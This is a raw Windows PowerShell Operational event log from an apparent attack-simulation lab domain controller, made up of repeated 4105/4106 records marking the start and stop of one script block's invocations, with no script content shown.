Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476045
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476044
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476043
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476042
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476041
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476040
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476039
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476038
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476037
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476036
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476035
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476034
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476033
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476032
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476031
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476030
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476029
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476028
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476027
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476026
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476025
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476024
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476023
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476022
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476021
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476020
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476019
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476018
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476017
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476016
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476015
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476014
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476013
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476012
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476011
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476010
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476009
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476008
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476007
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476006
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476005
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476004
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476003
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476002
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476001
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476000
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475999
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475998
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475997
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475996
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475995
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475994
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475993
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1475992
Keywords=None
Message=Completed invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1475991
Keywords=None
Message=Started invocation of ScriptBlock ID: d6c14113-c0ad-400d-976c-edc4a90fe5cd
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
